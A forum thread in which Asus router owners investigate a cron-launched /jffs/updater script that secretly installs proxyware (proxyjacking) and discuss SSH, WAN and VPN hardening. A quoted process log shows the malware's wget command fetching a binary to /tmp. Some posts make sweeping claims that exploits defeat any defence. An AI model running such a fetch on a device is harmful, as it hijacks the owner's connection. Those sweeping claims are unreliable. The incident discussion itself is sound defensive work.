What's new

Malware /jffs/updater script.

  • SNBForums Code of Conduct

    SNBForums is a community for everyone, no matter what their level of experience.

    Please be tolerant and patient of others, especially newcomers. We are all here to share and learn!

    The rules are simple: Be patient, be nice, be helpful or be gone!

We call this Proxyjacking. This is well known attack. This is not Malware but Exploit. It's not a new. The only difference is codes(little bit different). There is a funny thing. If I talk about these kinds of attacks at snbforum some people don't believe it. Some of them even say it doesn't exist. Don't forget you don't even know you are compromised with this attack even if you use Skynet or something else. Some attacks can evade those firewall scripts. Some codes can be generated with ChatGPT something.

.Swistheater?​

If you are targeted the attacker may attack you again and again even if you change a router or reset firmware unless you change the IP Address with different range.
I spoofed my Mac address to force an IP update by the modem.
 
It doesn't work if you change only IP address. You have to change IP range. Did you do that?
All I can say is the whole address changed including the range it resides in.
 
Good. Now, check your PC and devices you are using for sure. If there is a host in any device which is connected on your network can make this thing again.
^ This. ;)
 
We call this Proxyjacking. This is well known attack. This is not Malware but Exploit. It's not a new. The only difference is codes(little bit different). There is a funny thing. If I talk about these kinds of attacks at snbforum some people don't and didn't believe it. Some of them even say it doesn't exist. Don't forget you don't even know you are compromised with this attack even if you use Skynet or something else. Some attacks can evade those firewall scripts. Some codes can be generated with ChatGPT something.

.Swistheater?​

If you are targeted the attacker may attack you again and again even if you change a router or reset firmware unless you change the IP Address with different range.

As long as you fix the "hole" then even if they continue to target you, they shouldn't get in. Of course the challenge is figuring out what that hole is. If they're targeting from the outside, yes getting your IP to change can help, but if it is malware on the inside or related to VPN or DDNS, that won't do anything.

Personally I'd be using a completely new and very secure username and password on the router, after factory resetting, flashing with fresh known good firmware from a known clean PC, then factory resetting again. Of course all devices are OFF the network until each one is checked and cleaned in an isolated environment.
 
Do you think routers on John's fork could be impacted?
It's difficult to say as we don't know how the malware is getting onto the router. But certainly, if it does get onto the router it would likely be a bigger problem because John's firmware doesn't have asd to neuter it.
 
Good. Now, check your PC and devices you are using for sure. If there is a host in any device which is connected on your network can make this thing again.
Hah, it most likely utilized an unknown security flaw present on the router because no devices were present on the network the day that script originated. I was out of town.
 
As long as you fix the "hole" then even if they continue to target you, they shouldn't get in. Of course the challenge is figuring out what that hole is. If they're targeting from the outside, yes getting your IP to change can help, but if it is malware on the inside or related to VPN or DDNS, that won't do anything.
I've already mentioned it.
Personally I'd be using a completely new and very secure username and password on the router, after factory resetting, flashing with fresh known good firmware from a known clean PC, then factory resetting again. Of course all devices are OFF the network until each one is checked and cleaned in an isolated environment.
None of your solution works if he's targeted. Because this is not a normal hacking but Exploit.
 
It's difficult to say as we don't know how the malware is getting onto the router. But certainly, if it does get onto the router it would likely be a bigger problem because John's firmware doesn't have asd to neuter it.
This is not Malware but Exploit. Exploit can bypass any security stuff if the device has Vulnerability.
 
Hah, it most likely utilized an unknown security flaw present on the router because no devices were present on the network the day that script originated. I was out of town.
I hope you are not targeted. There are some solutions for you. However just keep watching your network very often for now. Let me know if you have
same issue again. Then I will give you how to do it.
 
Hah, it most likely utilized an unknown security flaw present on the router because no devices were present on the network the day that script originated. I was out of town.
Do not trust ANY consumer routers including ASUS. There are a lot of unknown vulnerabilities like Zero-Day attack. There are too many unknown vulnerabilities that manufacturers never know even in the future. Those vulnerabilities are traded for the money at black market.
 
This is not Malware but Exploit. Exploit can bypass any security stuff if the device has Vulnerability.
I know English isn't your first language but what we've been discussing here is malware. An exploit would be the method used to get it onto the router.

 
Some versions of 384 code had a vulnerability that let people in from the WAN if you had WAN access enabled, even if they didn't have your password. Even on 386, they can brute force or try common passwords and get in. Seems to be botnets programmatically attacking Asus routers, in fact once your router is infected one of the functions is probably to find and attack other routers.

WAN http/https access should be disabled. Ideally SSH too. If you must have SSH enabled to the WAN I would not only have a very strong password but also restrict it to only a client key that you give yourself. Merlin also rate limits SSH failed logins so that helps protect against brute force, but I'd still restrict the key.

Vulnerabilities in VPN could also give someone access to your router.

Thanks for the information about the old firmware versions. ;)

Yes you are right. I currently have these basic settings:

#WAN

Code:
MAC Address = Changed

#Firewall

Code:
Enable Firewall    = Yes
Enable DoS protection = Yes
Respond ICMP Echo (ping) Request from WAN = No

#System

Code:
Router Login Password = Strong
Enable SSH = Lan Only
Allow SSH Port Forwarding = No
SSH Port = Changed
Allow Password Login = No
Authorized Keys = Yes (+ private Key with strong password)

Code:
Authentication Method = HTTPS
HTTPS LAN port = Changed
Installed Server Certificate = Yes

Code:
Enable Web Access from WAN = No
Enable Access Restrictions = Yes (x2 devices of my network)

Note: In that option: "Allow Password Login = No", I have disabled to reject USER + PASSWORD login requests from SSH, only with the private key. Is this configuration/thought correct?

So what comes to my mind, for example these two "options":

- an infected client
- OpenVPN service vulnerability/misconfiguration (server/client) - I use this option a lot.

Is WireGuard currently more secure than OpenVPN? Or have the vulnerabilities not yet been discovered/exposed?
 
As long as you fix the "hole" then even if they continue to target you, they shouldn't get in. Of course the challenge is figuring out what that hole is. If they're targeting from the outside, yes getting your IP to change can help, but if it is malware on the inside or related to VPN or DDNS, that won't do anything.

Personally I'd be using a completely new and very secure username and password on the router, after factory resetting, flashing with fresh known good firmware from a known clean PC, then factory resetting again. Of course all devices are OFF the network until each one is checked and cleaned in an isolated environment.
It could possibly be ddns related, however one factor to consider is the wget log I posted shows that the first appearance happened right after a firmware update Check on the router was conducted.

Code:
(9213)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(10604)wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv5l/pawns-cli
(10603)/bin/sh /jffs/updater
(2412)/bin/sh -c /jffs/updater
(1)crond -l 9
(0)/sbin/init
(3502)wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv5l/pawns-cli
(3501)ash /jffs/updater

While I am not saying it is RMerlin related. Someone snooping could have saw opportunity to exploit a vulnerability in wget or the connection. I am still a bit on the fence about this one. I was out of town the day the malware hit the router. No devices were online except for some IoT blocked cameras. All computers were fully shutdown.
 
While I am not saying it is RMerlin related. Someone snooping could have saw opportunity to exploit a vulnerability in wget or the connection. I am still a bit on the fence about this one. I was out of town the day the malware hit the router. No devices were online except for some IoT blocked cameras. All computers were fully shutdown.

This is definitely a headscratcher. :(
 
Do not trust ANY consumer routers including ASUS. There are a lot of unknown vulnerabilities like Zero-Day attack. There are too many unknown vulnerabilities that manufacturers never know even in the future. Those vulnerabilities are traded for the money at black market.

So does Windows... or Mac, or LInux for that matter in general... but that doesn't stop us from using them.
 
This is definitely a headscratcher. :(
It makes sense though, how else would someone know they could monetize off the source routers connection. Obviously, the person knew what they were doing. It is a highly target approach to achieving their goal.
 

Similar threads

Support SNBForums w/ Amazon

If you'd like to support SNBForums, just use this link and buy anything on Amazon. Thanks!

Sign Up For SNBForums Daily Digest

Get an update of what's new every day delivered to your mailbox. Sign up here!
Top